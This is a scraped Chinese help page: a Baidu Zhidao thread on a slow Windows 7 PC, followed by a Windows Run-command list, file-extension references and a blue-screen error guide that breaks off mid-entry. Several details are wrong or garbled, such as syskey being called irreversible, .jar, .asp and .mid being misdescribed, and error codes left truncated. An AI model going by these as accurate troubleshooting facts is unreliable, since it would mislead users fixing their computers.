我的电脑win7系统,打开应用程序响应越来越慢_百度知道
我的电脑win7系统,打开应用程序响应越来越慢
打开我的电脑或者桌面文件夹就很快,但是打开那些扣扣啊,酷狗啊,还有打开游戏也是很慢,经常还会玩着玩着就卡住不动,像死机那样,我也经常清理垃圾的,c盘只装了系统就没其他东西,配置也不低了,cpu是AMD
4核2.8G速龙。内存4G,主板是技嘉大板A55M,刚装...
我有更好的答案
win7系统打开应用程序响应越来越慢的解决方法:1、点开始——在运行框中输入regedit,按回车键;2、依次展开【HKEY_CURRENT_USER】/【Control Panel】/【Desktop】/【WindowMetrics】,双击右侧窗格中的MinAniMate,数值数据输入0,点确定。
采纳率:94%
来自团队:
1你肯定很久没有清理磁盘碎片了、然后查木马,在桌面建一个快捷图标文件夹、软件除了系统软件外,软件照样可以用,其它的什么QQ、修复漏洞,清理注册表3。建议你按以下几个步骤来。C盘不要太大。 然后启动的程序不要太多、用360体验,一键修复所有问题、看电影的、听音乐的全部装在D盘4、右键计算器——属性——磁盘管理,进行磁盘碎片整理。 提示:一般电脑到后面会越来越慢。所以建议一个季度或者半年到一年重装一次系统。软件全部装在D盘。以后重装系统了。右键计算机——设备管理器——IDE。2
本回答被网友采纳
看看有没有多个杀毒,也有可能是硬盘有坏道
把那些软件最好换一个磁盘安装,你的情况可能是硬盘
你的电脑是自带的系统 还是?
装了一键还原嘛,还有连接设置 都有关的,这种事情常见的很,
其他2条回答
为您推荐:
其他类似问题
win7系统的相关知识
换一换
回答问题,赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。当菜鸟其实也很辛苦,自己收集点东西恭给将要展翅翱翔的菜鸟门! 开始-→运行--→命令 集锦 winver---------检查Windows版本 wmimgmt.msc----打开windows管理体系结构(WMI) wupdmgr--------windows更新程序 wscript--------windows脚本宿主设置 write----------写字板 winmsd---------系统信息 wiaacmgr-------扫描仪和照相机向导 winchat--------XP自带局域网聊天 mem.exe--------显示内存使用情况 Msconfig.exe---系统配置实用程序 mplayer2-------简易widnows media player mspaint--------画图板 mstsc----------远程桌面连接 mplayer2-------媒体播放机 magnify--------放大镜实用程序 mmc------------打开控制台 mobsync--------同步命令 dxdiag---------检查DirectX信息 drwtsn32------ 系统医生 devmgmt.msc--- 设备管理器 dfrg.msc-------磁盘碎片整理程序 diskmgmt.msc---磁盘管理实用程序 dcomcnfg-------打开系统组件服务 ddeshare-------打开DDE共享设置 dvdplay--------DVD播放器 net stop messenger-----停止信使服务 net start messenger----开始信使服务 notepad--------打开记事本 nslookup-------网络管理的工具向导 ntbackup-------系统备份和还原 narrator-------屏幕“讲述人” ntmsmgr.msc----移动存储管理器 ntmsoprq.msc---移动存储管理员操作请求 netstat -an----(TC)命令检查接口 syncapp--------创建一个公文包 sysedit--------系统配置编辑器 sigverif-------文件签名验证程序 sndrec32-------录音机 shrpubw--------创建共享文件夹 secpol.msc-----本地安全策略 syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码 services.msc---本地服务设置 Sndvol32-------音量控制程序 sfc.exe--------系统文件检查器 sfc /scannow---windows文件保护 tsshutdn-------60秒倒计时关机命令 tourstart------xp简介(安装完成后出现的漫游xp程序) taskmgr--------任务管理器 eventvwr-------事件查看器 eudcedit-------造字程序 explorer-------打开资源管理器 packager-------对象包装程序 perfmon.msc----计算机性能监测程序 progman--------程序管理器 regedit.exe----注册表 rsop.msc-------组策略结果集 regedt32-------注册表编辑器 rononce -p ----15秒关机 regsvr32 /u *.dll----停止dll文件运行 regsvr32 /u zipfldr.dll------取消ZIP支持 cmd.exe--------CMD命令提示符 chkdsk.exe-----Chkdsk磁盘检查 certmgr.msc----证书管理实用程序 calc-----------启动计算器 charmap--------启动字符映射表 cliconfg-------SQL SERVER 客户端网络实用程序 Clipbrd--------剪贴板查看器 conf-----------启动netmeeting compmgmt.msc---计算机管理 cleanmgr-------垃圾整理 ciadv.msc------索引服务程序 osk------------打开屏幕键盘 odbcad32-------ODBC数据源管理器 oobe/msoobe /a----检查XP是否激活 lusrmgr.msc----本机用户和组 logoff---------注销命令 iexpress-------木马捆绑工具,系统自带 Nslookup-------IP地址侦测器 fsmgmt.msc-----共享文件夹管理器 utilman--------辅助工具管理器 gpedit.msc-----组策略
楼主发言:1次 发图:0张 | 更多
图像文件名后缀 进入多媒体世界后,大家会看到各种各样精彩的图片,会发现许多种后缀名。的确,由于各个公司在开发图形有关的软件时都自制标准,导致今日在图形方面有太多的格式,以下就是常见的几种格式: 首先是一种位图文件格式,它是一组点(像素)组成的图像,它们由图像程序生成或在扫描图像时创建。主要有Windows位图(.BMP):由Microsoft公司开发,它被Windows和Windows NT平台及许多应用程序支持。支持32位颜色,用于为Windows界面创建图标的资源文件格式,光标(.CUR、.DLL、.EXE):资源文件格式,用于创建Windows界面的光标。OS/2位图(.BMP):Microsoft公司和IBM开发的位图文件格式。它为各种操作系统和应用程序所支持。支持压缩,最大的图像像素为6000。画笔(.PCX):由Zsoft公司推出,它对图像数据也进行了压缩,可由PCX生成。用于Windows的画笔。支持24位颜色,最大图像像素是6000。支持压缩。图形交换格式: Graphics Interchage Format(.GIF):由Compu Serve创建,它能以任意大小支持图画,通过压缩可节省存储空间,还能将多幅图画存在一个文件中。支持256色,最大图像像素是6000。 Kodak Photo CD(.PCD):Eastman Kodak所开发的位图文件格式,被所有的平台所支持,PCD支持24位颜色,最大的图像像素是72,用于在CD-ROM上保存照片。 Adobe Photoshop(.PSD):Adobe Photoshop的位图文件格式,被Macintosh和MS Windows平台所支持,最大的图像像素是3000,支持压缩,广泛用于商业艺术。 Macintosh绘画(.MAC):Apple公司所开发的位图文件格式。被Macintosh平台所支持,仅支持单色原图,最大图像像素是576×720。支持压缩,主要用于在Macintosh图形应用程序中保存黑白图形和剪贴画片。 动画文件的后缀名 动画文件格式用于保存包含动画框架中的图形信息。主要有:Autodesk FLIC(.FLC):即.FLI,Autodesk Animator和AnimatorPro的动画文件格式。支持256色,最大的图像像素是6000,支持压缩。广泛用于动画图形中的动画序列、计算机辅助设计和计算机游戏应用程序。不大适合制作真实世界图像动画。 MacPICTS(.PCS,.PIC):Macromedia开发的动画文件格式,为Macintosh应用程序使用。支持256色,支持压缩,用于保存动画数据,是Quick Time的前身。 Microsoft资源互换文件格式,TIFF(.AVD):Microsoft公司开发的动画文件格式,被Windows、Windows NT平台和OS/2多媒体应用程序所支持,支持256色和压缩,用于在多媒体应用程序中保存音频、视频和图形信息。 MPEG(.MPEG):国际标准化组织的运动图像专家小组开发的动画文件格式。被所有平台和Xing Technologies MPEG播放器及其它应用程序所支持,支持压缩,最大图像像素是94×30帧/每秒。用于编码音频、视频、文本和图形数据。 Quick Time(.QTM):Apple计算机公司开发的动画文件格式。被Apple Macintosh和Microsoft Windows平台所支持,支持25位颜色,最大图像像素是6000,支持压缩,用于保存音频和运动视频信息。 声音文件的后缀名 声音文件格式是用于保存数字音频信息的。它们主要有: AIFF(.AIF):这是Apple计算机公司开发的声音文件格式,被Macintosh平台和应用程序所支持。支持压缩。 Amiga声音(.SVX):Commodore所开发的声音文件格式,被Amiga平台和应用程序所支持,不支持压缩。 MAC声音(.SND):Apple计算机公司开发的声音文件格式,被Macintosh平台和多种Macintosh应用程序所支持,支持某些压缩。 MIDI(.MID):国际MIDI协会开发的声音文件格式,被Windows平台和许多应用程序所支持,用于为乐器创建数字声音。 声霸(.VOC):Creative Labs公司开发的声音文件格式,被Windows和DOS平台所支持,支持压缩。 WAVE(.WAV):微软公司用作Windows平台上保存音频信息的资源格式。 压缩文件的后缀名 为了提高存储效率,许多公司都推出了压缩数据的方法和相应的软件,这类文件的使用主要通过压包和解包软件来进行,主要的后缀有:*.zip、*.arj、*.rar、*.lzh、*.jar。还有一些专用的压缩文件,如:*.ex_、*.dl_、*.d3_、*.cab等。 数据库类文件的后缀名 在Dbase、FoxBase、Foxpro系列软件的环境下有以下几类后缀: .dbf 数据库文件(databasefile) .prg 命令文件(即程序Program) .fxp 编译后的程序 .scx和.sct 屏幕文件 .fpt 备注字段文件 .frx和.frt 报表文件 .cbx和.pjt 标签文件 .mnx 和.mnt 菜单文件 .pjx和.pjt 工程文件 .app 应用文件 .cdx和.idx 索引文件 .qpr和.qpx SQL查询文件 .fp 配置文件 .ap 生成应用 .err 编译错误文件 .men 内存应用 .fky 键宏文件 .win 窗口文件 .pcb 库文件 .tmp 临时文件 .tbk 临时数据库文件 可安全删除的文件类型 临时文件:*.tmp,*.syd,*.$$$,*.@@@,*._mp,*.gid,*.~*,*.gts 备份文件:*.bak,*.old,*.wbk,*.xlk,*.ckr_ 帮助文件:*.hlp、*.chm、*.cnt 后记 用户要注意在不同的操作系统下,后缀名的约定会有所不同,如在Unix下,*.p代表Pascal语言程序,*.z代表压缩文件,*.tar代表归档文件。另外,针对极特殊的设备,其驱动程序也会有特殊的后缀,如3DS显示卡的驱动程序是*.exp。还有某些公司针对自己的产品也规定了文件名后缀,如方正公司的图像排版文件规定用*.grh(即Graph)。 文件名的后缀代表着某一种类型的文件,一般会由某一种特定的软件产生和处理。只有对这些后缀名的知识有一定的了解,才能在上机的过程中知道其所以然。这儿带着大家看到了常见的一些后缀类型,实际上还有很多类型,不可能全部讲完。常言说,师傅领进门,修行在个人,以后大家在计算机世界中自己转着看吧。
常见的文件后缀名 .ACA Microsoft的代理使用的角色文档 .acf 系统管理配置 .acm 音频压缩管理驱动程序,为Windows系统提供各种声音格式的编码和解码功能 .aif 声音文件,支持压缩,可以使用Windows Media Player和QuickTime Player播放 .AIF 音频文件,使用Windows Media Player播放 .AIFC 音频文件,使用Windows Media Player播放 .AIFF 音频文件,使用Windows Media Player播放 .ani 动画光标文件扩展名,例如动画沙漏。 .ans ASCII字符图形动画文件 .arc 一种较早的压缩文件,可以使用WinZip,WinRAR,PKARC等软件打开 .arj 压缩文件。可以使用WinZip,WinRAR,PKARC等软件打开 .asf 微软的媒体播放器支持的视频流,可以使用Windows Media Player播放 .asp 微软的视频流文件,可以使用Windows Media Player打开 .asp 微软提出的Active Server Page,是服务器端脚本,常用于大型网站开发,支持数据库连接,类似PHP。可以使用Visual InterDev编写,是目前的大热门 .asx Windows Media 媒体文件的快捷方式 .au 是Internet中常用的声音文件格式,多由Sun工作站创建,可使用软件Waveform Hold and Modify 播放。Netscape Navigator中的LiveAudio也可以播放.au文件 .avi 一种使用Microsoft RIFF规范的Windows多媒体文件格式,用于存储声音和移动的图片 .bak 备份文件,一般是被自动或是通过命令创建的辅助文件,它包含某个文件的最近一个版本,并且具有于该文件相同的文件名 .bas Basic 语言源程序文件,可编译成可执行文件,目前使用Basic开发系统的是Visual Basic .bat 批处理文件,在MS-DOS中,.bat文件是可执行文件,有一系列命令构成,其中可以包含对其他程序的调用 .bbs 电子告示板系统文章信息文件 .bfc Windows的公文包文件 .bin 二进制文件,其用途依系统或应用而定 .bmp Bitmap位图文件,这是微软公司开发Paint的自身格式,可以被多种Windows和Windows NT平台及许多应用程序支持,支持32位颜色,用于为Windows界面创建图标的资源文件格式。 .c C 语言源程序文件,在C语言编译程序下编译使用 .cab Microsoft制订的压缩包格式,常用于软件的安装程序,使用Windows自带的实用程序,Extract.exe可以对其解压缩,WinZip,WinRAR等都支持这种格式 .cal Windows 中的日历文件 .cdf Internet Explorer的频道文件 .cdr CorelDraw中的一种图形文件格式,它是所有CorelDraw应用程序中均能够使用的一种图形图像文件格式 .cdx 索引文件,存在于Dbase,Foxbase,Foxpro系统软件环境下 .cfg 配置文件,系统或应用软件用于进行配置自己功能,特性的文件 .chm 编译过后的HTML文件,常用于制作帮助文件和电子文档 .clp 在Windows下剪贴板中的文件格式 .cmd 用于Windows NT/2000的批处理文件,其实与BAT文件功能相同,只是为了与DOS/Windows 9x下的BAT有所区别 .cmf 声卡标准的音乐文件,FM合成器等可以回放 .cnf NetMeetting会议连接文件 .cnt 联机帮助文件目录索引文件,通常和同名的.hlp文件一起保存 .col 由Autodesk Animator,Autodesk Animator Por等程序创建的一种调色板文件格式,其中存储的是调色板中各种项目的RGB值 .com DOS可执行命令文件,一般小于64KB .cpl 控制面板扩展文件,Windows操作系统使用 .cpp C++语言源程序,非常强大的语言,在各种平台中都有相应的开发系统 .crd Windows中的卡片文件 .crt 用于安全方面的证书认证文件 .cur Windows下的光标资源文件格式,可用光标编辑软件编辑 .css Text/css文件 .dat 数据文件,在应用程序中使用 .dat VCD中的图象声音文件,VCD播放软件可调用,或是通过VCD机播放 .dbf 数据库文件,Foxbase,Dbase,Visual FoxPro,等数据库处理系统所产生的数据库文件 .dcx 传真浏览文档文件 .ddi 映象文件,DUP,HD,IMG等工具可展开 .dev 设备驱动程序 .dib 设备无关位图文件,这是一种文件格式,其目的是为了保证用某个应用程序创建的位图图形可以被其它应用程序装载或显示一样 .dir 目录文件 .dll Windows动态连接库,几乎无处不在,但有时由于不同版本DLL冲突会造成败各种各样的问踢 .doc 是目前市场占有率最高的办公室软件Microsoft Office中的字处理软件Word创建的文档 .dos Windows保留的MS-DOS的某些系统文件 .dot Microsoft Word的文档模板文件,通过模板可以简化一些常用格式文档的创建工作,而且可以内嵌VBA程序来实现某些自动化功能 .drv 设备驱动程序文件,用在各种系统中 .dwg AutoCAD的图纸文件,也是许多绘图软件都支持的格式,常用于共享数据 .dxb AutoCAD创建的一中图形文件格式 .dxf 图形交换格式,一种计算机辅助设计的文件格式,最初开发用来与AutoCAD一起使用,以便于图形文件在应用程序之间的传递,它以ASCII方式储存图形,在表现图形的大小方面十分精确 .der Certiticate文件 .dic Txt文件 .emf 由Microsoft公司开发的Windows 32位扩展图元文件格式,其总体设计目标是要彌补在Microsoft Windows 3.1(Win16)中用的*.wmf文件格式的不足,使得图元文件更加易于使用 .eps 用PostScript语言描述的一种图形文件格式,以文本文件保存,在PostScript图形打印机上能打印出高品质的图形图象,最高能表示32位图形图象 .err 编译错误文件,存在于Dbase,Foxbase,Foxpro系列软件环境下 .exe 可执行文件,虽然后缀名相同,但具有不同的格式和版本 .exp 3DS使用的显示卡驱动程序 .exc Txt文件 .flc Autodesk Animator和Animatorpro的动画文件,支持256色,最大的图象象索是,支持压缩,广泛用于动画图形中的动画序列,计算机辅助设计和计算机游戏应用程序 .fnd 保存的搜索结果 .fon 点阵字库文件 .for Fortran语言程序 .fot 指向字体的快捷键 .fp 配置文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下 .fpt 备注字段文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下 .frt 报表文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下 .frx 报表文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下 .fxp 编译后的程序,存在于Dbase,Foxbase,Foxpro系列软件的环境下 .gif 在各种平台的各种图形处理软件上均能够处理的,经过压缩的一种图形文件格式 .grh 方正公司的图象排版文件 .grp Windows下的程序管理器产生的组窗口文件 .goc Gocserve .gra MSGraph.Chart.5 .h C语言源程序头文件 .hlp Windows应用程序帮助文件 .hqx Macintosh中使用BinHex将二进制文件编码为7位的文本文件,大多数Macintosh文件皆以.hqx出现(.bin极少使用),在Macintosh中,可使用StuffIt Expander对.hqx解码,在Windows中可使用BinHex 13解码 .ht 超级终端 .htm 保存超文本描述语言的文本文件,用于描述各种各样的网页,使用各种浏览器打开 .html 同.htm文件 .icm 图象配色描述文件 .ico Windows中的图标文件,可以包含同一个图标的多种格式,使用图标编辑软件创建 .idf MIDI乐器定义 .idx 索引文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下 .iff 文件交换格式文件,这种文件格式多用于Amiga平台,在这种平台上它几乎可以存储各种类型的数据,在其它平台上,IFF文件格式多用于存储图象和声音文件 .image MAcintosh磁盘映象文件,常见于萍果机的FTP网点,在Macintosh中由Shrink Wrap处理 .ime Windows下的输入法文件 .img 磁盘映象文件,用HD-COPY,WinImage等工具打开后可以恢复到一张磁盘上
.inc 汇编语言包含文件,类似C/C++中的.H文件 .inf Windows下的软件安装信息,Windows的标准安装程序根据此文件内的安装信息对软件,驱动程序等进行安装 .ini Windows中的初始化信息文件,已经用的不多了,新的应用程序将设置保存在系统的注册表中 .jar 一种压缩文件,ARJ的新版本,不过不太流行,可以使用WinJar,Winrar等打开 .jpeg 一种图片压缩文件,同.jpg .jpg 静态图象专家组制订的静态图象压缩标准,具有很高的压缩比,使用非常广泛,可使用PhotoShop等图象处理软件创建 .lnk 快捷方式,这个文件指向另一个文件,开始菜单的程序文件夹下每条项目都是一个LNK文件 .log 日志文件,通常用来记录一些事件之类 .lzh 一种古老的压缩文件,可以使用WinRAR打开 .mac Macintosh中使用的一中灰度图形文件格式,在Macintosh Paintbrush中使用,其分辨率只能是720*567 .mag 图形文件格式 .mdb Microsoft Access使用的数据库格式,是非常流行的桌面数据库 .men 内存应用文件,存在于Dbase,Foxbase,Foxpro系列软件的环境下 .mid 音频压缩文件,曾经非常流行,不过在现在的软件中用的很少了 .mif MIDI乐器 .mov 使用Apple`s QuickTime格式的电影文件,在Macintosh中由Sparkle,FastPlayer,MoviePlayer等软件播放,在Windows中可由Quicktime播放 .movie QuickTime或苹果机的影视格式,在Macintosh中由Sparkle,FastPlayer,MoviePlayer等软件播放,在Windows中可由QuickTime播放 .mp3 采用MPEG-1 Layout 3标准压缩的音频文件,是网上主要的压缩音频文件,这种文件由于具有极高的压缩率和失真低的特点,是目前音乐盗版的主要文件格式,但目前受到VQF,WMA等新标准的挑战 .mpg 采用MPEG-1标准压缩的视频文件,与VCD使用的格式非常相近,提供CD质量的音频信号和320*240的视频分辩率,目前的媒体播放软件大都能播放,Microsoft的WMV8和MPEG-4压缩的AVI文件是其强大的竞争对手 .mpt Macintosh中使用的一种图形文件格式 .msg Microsoft邮件文档 .obj 对象代码 .ovl 由于软件功能多,内存偏小,不能一次性全部调入内存的可执行文件可能有同文件名的ovl文件 .pcd 位图文件,由Eastman Kodak开发,被所有的平台所支持,PCD支持24位颜色,最大的图象像索是,用于在CD-ROM上保存图片 .pcs 动画文件,是Macromedia开发的动画文件格式,为Macintosh应用程序使用,支持压缩,支持256色,用于保存动画数据,是Quick Time的前身 .pcx 图像文件,PCX格式是ZSOFT公司在开发图像处理软件Paintbrush是开发的一种格式,这是一种经过压缩的格式,占用磁盘空间较少 .pdf 图文多媒体文件,Adobe公司定义的电子印刷品文件格式,它是一种事实上的标准,在Internet网上的很多电子印刷品,都是.pdf格式的 .psd 是PhotoShop中使用的一种标准图形文件格式,能够保存图像数据的每一个细小部分,包括层,附加的蒙版通道以及其他内容 .pwl Windows下的口令文件 .qt Machintosh 的QuickTime影视格式,在Macintosh中由Sparkle,FastPlayer,MoviePlayer等软件播放,在Windows中可由Quicktime播放 .qtm 动画文件,这种文件格式是由Apple计算机公司开发,被Apple Macintosh和Microsoft Windows平台所支持,支持25位颜色,最大图像分辩率是,支持压缩,用于保存音频和运动视频信息 .rec Windows下的记录器宏文件 .reg Windows 95/98的系统及应用程序注册文件,这种文件虽然以纯文本文件保存,但一样存在版本问题,不同的操作系统使用的REG文件版本是不同的 .rle 一种压缩过的位图文件格式,RLE压缩方案是一种极其成熟的压缩方案,特点是无损失压缩,既节省了磁盘空间又不损失任何图像数据,但在打开这种压缩文件时,要花费更多时间,此外,一些兼容性不太好的应用程序可能会搭不开 .rm Windows下的RealPlayer所支持的视频压缩文件,网上非常流行的流式视频文件,很多实时视频新闻等都是采用这种格式的,不过,最新的Windows Media Video V8已经对其发起了强大的攻势 .rmi MIDI音序文件 .rtf 丰富文本格式文件,以纯文本描述内容,能够保存各种格式信息,可以用写字版,Word等创建 .sav 存档文件 .scp 用于Windows系统中Internet拨号用户,自动拨号登录用的脚本文件,可避免手动登录时繁琐的键盘输入 .scr 屏障保护文件 .sct 屏幕文件 .scx 屏幕文件 .set Microsoft备份集文件,用于保存要备份的内容,设置等信息 .shb 指向一个文档的快捷方式 .snd Mac声音文件,Apple计算机公司开发的声音文件格式,被Macintosh平台和多种Macintosh应用程序所支持,支持某些压缩 .sql 查询文件,在Dbase,Foxbase,Foxpro系列软件的环境下使用 .svg SVG可以算是目前最火热的图像文件格式了,它是基于XML由WorldWideWebConsortium联盟开发的,SVG是可缩放的矢量图形 .svx Amiga声音文件,Commodore所开发的声音文件格式,被Amiga平台和应用程序所支持,不支持压缩 .swf flash是Micromedia公司的产品,严格说它是一种动画编辑软件,实际上它是制作出一种后缀名为.swf的动画,这种格式的动画能用比较小的体积来表现丰富的多媒体形式,并且还可以与HTML文件达到一种&水乳交融&的境界 .swg 虚拟内存交换文件,由操作系统使用 .sys 系统文件,驱动程序等,在不同的操作系统中有不同的定义 .tbk 临时数据库文件,在Dbase,Foxbase,Foxpro系列软件的环境下使用 .tga 图像文件,此文件格式的结构比较简单,属于一种图形,图像数据的通用格式,在多媒体领域有着很大影响,是计算机生成图像向电视转换的一种首选格式 .tiff 图像文件,此图像格式复杂,存储内容多,占用存储空间大,其大小是GIF图像的3倍,是相应的JPEG图像的10倍,最早流行于Macintosh,现在Windows主流的图像应用程序都支持此格式 .tmp 临时文件,一般是系统和应用程序产生的临时使用的文件,当系统和应用程序退出时,会自动地删除其建立的临时文件,如果是非正常退出,临时文件可能保留在磁盘上,在单任务系统下,可立即删除它们,在多任务系统下,应删除那些不是正在使用的临时文件 .txt 文本文件 .url InternetShortcut(internet 上URL地址的快捷方式) .vcd 虚拟光驱工具制作的光盘镜像文件 .ver 版本描述,用于描述某个软件的版本信息的文件,内容因软件而异 .voc 声音文件,此文件格式由Creative Labs公司开发,被Windows和DOS平台所支持,支持压缩 .vxd 虚拟设备驱动程序,在Windows操作系统中非常常见,是重要的系统文件 .wab 通信簿文件,由系统中的通信簿程序使用 .wav 音频文件,此文件格式是在Windows上用于保存音频信息的资源格式,Windows中由Waveform Hold and Modify或Navigator,或&媒体播放机&播放,存在许多编码方式,需要相应的解码程序才能播放 .win 窗口文件,在Dbase,Foxbase,Foxpro系列软件的环境下使用 .wmf Microsoft Windows中常见的一种图元文件格式,它具有文件短小,图案造型化的特点,整个图形常由各个独立的组成部分拼接而成,但其图形往往较粗糙,并且只能在Microsoft Office中调用编辑 .wpc 写字板文档转换 .wps Wps文本文件,有多种版本,可以使用Wps Office,Wps 2000等打开 .wri Windows写字板文档 .xab Microsoft邮件地址簿 .xbm Animator Pro创建的一种图形文件格式,其中包含用来描述多边形的一系列点的信息 .zip 是DOS/Windows中最常见文件压缩格式,也是互联网上的标准压缩格式,可以包含路径和多个文件
Windows非法操作详解 1.停止错误编号:0x0000000A 说明文字:IRQL-NOT-LESS-OR-EQUAL 通常的原因:驱动程序使用了不正确的内存地址. 解决方法:如果无法登陆,则重新启动计算机.当出现可用的作系统列表时,按F8键.在Windows高级选项菜单屏幕上,选择&最后一次正确的配置&,然后按回车键. 检查是否正确安装了所有的新硬件或软件.如果这是一次全新安装,请与硬件或软件的制造商联系,获得可能需要的任何Windows更新或驱动程序. 运行由计算机制造商提供的所有的系统诊断软件,尤其是内存检查. 禁用或卸掉新近安装的硬件(RAM,适配器,硬盘,调制解调器等等),驱动程序或软件. 确保硬件设备驱动程序和系统BIOS都是最新的版本. 确保制造商可帮助你是否具有最新版本,也可帮助你获得这些硬件. 禁用 BIOS内存选项,例如cache或shadow. 2.停止错误编号:0x0000001E 说明文字:KMODE-EXPTION-NOT-HANDLED 通常的原因:内核模式进程试图执行一个非法或未知的处理器指令. 解决方法:确保有足够的空间,尤其是在执行一次新安装的时候. 如果停止错误消息指出了某个特定的驱动程序,那么禁用他.如果无法启动计算机.应试着用安全模式启动,以便删除或禁用该驱动程序. 如果有非 Microsoft支持的视频驱动程序,尽量切换到标准的VGA驱动程序或Windows提供的适当驱动程序. 禁用所有新近安装的驱动程序. 确保有最新版本的系统BIOS.硬件制造商可帮助确定你是否具有最新版本,也可以帮助你获得他. BIOS内存选项,例如cache,shadow. 3.停止错误编号:0xx 说明文字:FAT-FILE-SYSTEM或MTFS-FILE-SYSTEM 通常原因:问题出现在Ntfs.sys(允许系统读写NTFS驱动器的驱动程序文件)内. 解决方法:运行由计算机制造商提供的系统诊断软件,尤其是硬件诊断软件. 禁用或卸载所有的反病毒软件,磁盘碎片整理程序或备份程序. 通过在命令提示符下运行Chkdsk /f命令检查硬盘驱动器是否损坏,然后重新启动计算机. 4.停止编号:0x0000002E 说明文字:DATA-BUS-ERROR 通常的原因:系统内存奇偶校验出错,通常由硬件问题导致. 解决方法:卸掉所有新近安装的硬件(RAM.适配器.硬盘.调制解调器等等). 运行由计算机制造商提供的系统诊断软件,尤其是硬件诊断软件. 确保硬件设备驱动程序和系统BIOS都是最新版本. 使用硬件供应商提供的系统诊断,运行内存检查来查找故障或不匹配的内存. 禁用BIOS内存选项,例如cache或shadow. 在启动后出现可用作系统列表时,按F8.在Windows高级选项菜单屏幕上,选择&启动VGA模式:.然后按回车键.如果这样做还不能解决问题,可能需要更换不同的视频适配器列表,有关支持的视频适配器列表,请参阅硬件兼容性列表. 5.停止编号:0x0000003F 说明文字:NO-MOR-SYSTEM-PTES 通常的原因:每哟正确清理驱动程序. 解决方法:禁用或卸载所有的反病毒软件,磁盘碎片处理程序或备份程序. 6:停止错误编号:0x 说明文字:FTDISK-INTERN-ERROR 通常的原因:容错集内的某个主驱动器发生故障. 解决方法:使用Windows安装盘启动计算机,从镜象(第2)系统驱动器引导.有关如何编辑Boot.ini文件以指向镜象系统驱动器的指导,可在MIcrosoft支持服务Web站点搜索&Edit ARC path&. 7.停止错误编号:0x0000007B 说明文字:INACCESSI-BLE-BOOT-DEVICE 通常原因:初始化I/O系统(通常是指引导设备或文件系统)失败. 解决方法:引导扇区病毒通常会导致这种停止错误.是用反病毒软件的最新版本,检查计算机上是否有存在病毒.如果找到病毒,则必须执行必要的不找把他从计算机上清除掉,请参阅反病毒软件文档了解如何执行这些步骤. 卸下所有新近安装的硬件(RAM,适配器,调制解调器等等). 核对MIcrosoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容. 如果使用的适SCSI适配器,可以从硬件供应商除获得最新WINDOWS驱动程序,禁用SCSI设备的同步协商,检查该SCSI链是否终结,并核对这些设备的SCSI ID,如果无法确定如何执行能够这些步骤,可参考硬件设备的文档. 如果你用的是IDE设备,将板上的IDE端口定义为唯一的主端口.核对IDE设备的主/从/唯一设置.卸掉除硬盘之外的所有IDE设备.如果无法确认如何执行这些不找,可参考硬件文档. 如果计算机已使用NTFS文件系统格式化,可重新启动计算机,然后在该系统分区上运行Chkdsk /f/r命令.如果由于错误而无法启动系统,那么使用命令控制台,并运行Chkdsk /r命令. 运行Chkdsk /f命令以确定文件系统是否损坏.如果Windows不能运行Chkdsk命令,将驱动器移动到其他运行Windows的计算机上,然后从这台计算机上对该驱动器运行Chkdsk命令. 8.停止错误编号:0x0000007F 说明文字:UNEXPECTED-KERNEL-MODE-TRAP 通常的原因:通常是由于硬件或软件问题导致,但一般都由硬件故障引起的. 解决方法:核对Microsoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容.如果计算机主板不兼容就会产生这个问题. 卸掉所由新近安装的硬件. 运行由计算机制造商提供的所有系统诊断软件,尤其是内存检查. 禁用BIOS内存选项,例如cache或shadow. 9.停止错误编号:0x 说明文字:PAGE-FAULT-IN-NONPAGED-AREA 通常的原因:内存错误(数据不能使用分页文件交换到磁盘中). 解决方法:卸掉所有的新近安装的硬件. 运行由计算机制造商提供的所有系统诊断软件.尤其是内存检查. 检查是否正确安装了所有新硬件或软件,如果这是一次全新安装,请与硬件或软件制造商联系,获得可能需要的任何Windows更新或驱动程序. 禁用或卸载所有的反病毒程序. 禁用BIOS内存选项,例如cache或shadow. 10.停止错误编号:0x 说明文字:KERNEL-STEL-STACK-INPAGE-ERROR 通常的原因:无法从分页文件将内核数据所需的页面读取到内存中。 解决方法:使用反病毒软件的最新版本,检查计算机上是否有病毒。如果找到病毒,则执行必要的步骤把他从计算机上清除掉。请参阅制造商提供的所有系统诊断软件,尤其是内存检查。 禁用BIOS内存选项,例如cache,shadow. 11.停止错误编号:0x 说明文字:MISMATCHED-HAL 通常的原因:硬件抽象层与内核或机器类型不匹配(通常发生在单处理器和多处理器配置文件混合在同一系统的情况下)。 解决方法:要解决本错误,可使用命令控制台替换计算机上错误的系统文件。 单处理器系统的内核文件是Ntoskml.exe,而多处理器系统的内核文件是Ntkrnlmp.exe,但是,这些文件要与安装媒体上的文件相对应;在安装完Windows2000和,不论使用的是哪个原文件,都会被重命名为Ntoskrnl.exe文件。HAL文件在安装之后也使用名称Hal.dll但是在安装媒体,但是在安装媒体上却有若干个可能的HAL文件。 12.停止错误编号:0x0000007A 说明文字:KERNEL-DATA-INPAGE-ERROR 通常的原因:无法从分页文件将内核数据所需的页面读取到内存中。(通常是由于分页文件上的故障,病毒,磁盘控制器错误或由故障的RAM引起的)。 解决方法:使用反病毒软件的最新版本,检查计算机上是否存在病毒。如果找到病毒。则执行必要的步骤把他从计算机上清除掉,请参阅犯病度软件文档了解如何执行这些步骤。 如果计算机已使用NTFS文件系统格式化。可重新启动计算机,然后在该系统分区上运行Chkdsk /f/r命令。如果由于错误而无法启动命令,那么使用命令控制台,并运行Chkdsk /r命令。 运行由计算机制造商提供的所有的系统在很端软件,尤其是内存检查。 13.停止错误编号:0xC000021A 说明文字:STATUS-SYSTEM-PROCESS-TERMINATED 通常的原因:用户模式子系统,例如Winlogon或客户服务器运行时子系统(CSRSS)已被损坏,所以无法再保证安全性。 解决方法:卸掉所有新近安装的硬件。 如果无法登陆,则重新启动计算机。当出现可用的作系统列表时按F8。在Windows2000高级选项菜单屏幕上,选择:“最后一次正确的配置”。然后按会车。 运行故障恢复台,并允许系统修复任何检测到的错误。 14.停止错误编号:0xC0000221 说明文字:STATUS-IMAGE-CHECKISU7M-MISMATCH 